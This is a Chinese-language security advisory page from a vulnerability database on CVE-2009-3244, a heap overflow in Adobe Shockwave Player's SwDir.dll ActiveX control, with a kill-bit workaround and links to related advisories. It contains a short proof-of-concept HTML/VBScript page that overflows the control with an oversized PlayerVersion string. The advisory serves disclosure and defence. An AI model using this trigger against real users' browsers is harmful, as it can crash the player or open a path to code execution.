Lucene search
RootSSV:12380HistorySep 22, 2009 - 12:00 a.m.
Adobe ShockWave Player SwDir.dll控件堆溢出漏洞
2009-09-2200:00:00
Root
www.seebug.org
13
EPSS
0.849
Percentile
98.5%
CVE ID: CVE-2009-3244
Adobe Shockwave Player是专门播放使用Director Shockwave Studio制作的网页的外挂软件。
Shockwave Player所提供的SwDir.dll ActiveX控件在播放恶意网页文件时存在堆溢出漏洞,用户受骗打开了包含有超长PlayerVersion属性值的HTML文件时就可能触发这个溢出,导致拒绝服务或执行任意代码。
Adobe Shockwave Player 11.5.1.601
临时解决方法:
- 为CLSID {233C1507-6A77-46A4-9443-F871F945D258}设置kill-bit。
厂商补丁:
Adobe
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<html>
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object>
<script language='vbscript'>
argCount = 1
arg1=String(2097152, "A")
ShockW.PlayerVersion = arg1
</script>
http://sebug.net/exploit/12322/
Related
prion
prion
Heap overflow
2009-09-18 10:30:00
cvelist
cvelist
CVE-2009-3244
2009-09-18 10:00:00
exploitdb
exploitdb
Adobe Shockwave Player 11.5.1.601 - ActiveX Buffer Overflow (PoC)
2009-09-15 00:00:00
Adobe Shockwave Player 11.5.1.601 - Multiple Code Executions
2009-11-04 00:00:00
openvas
openvas
Adobe Shockwave Player ActiveX Control BOF Vulnerability
2009-09-24 00:00:00
Adobe Shockwave Player ActiveX Control BOF Vulnerability
2009-09-24 00:00:00
nvd
nvd
CVE-2009-3244
2009-09-18 10:30:01
cve
cve
CVE-2009-3244
2009-09-18 10:30:01
securityvulns
securityvulns
Security updates available for Shockwave Player
2009-11-05 00:00:00
Adobe Shockwave Player Multiple security vulnerabilities
2009-11-05 00:00:00
nessus
nessus
Adobe Shockwave Player <= 11.5.1.601 Multiple Vulnerabilities (APSB09-16) (Mac OS X)
2014-12-22 00:00:00
Shockwave Player <= 11.5.1.601 Multiple Vulnerabilities (APSB09-16)
2009-11-04 00:00:00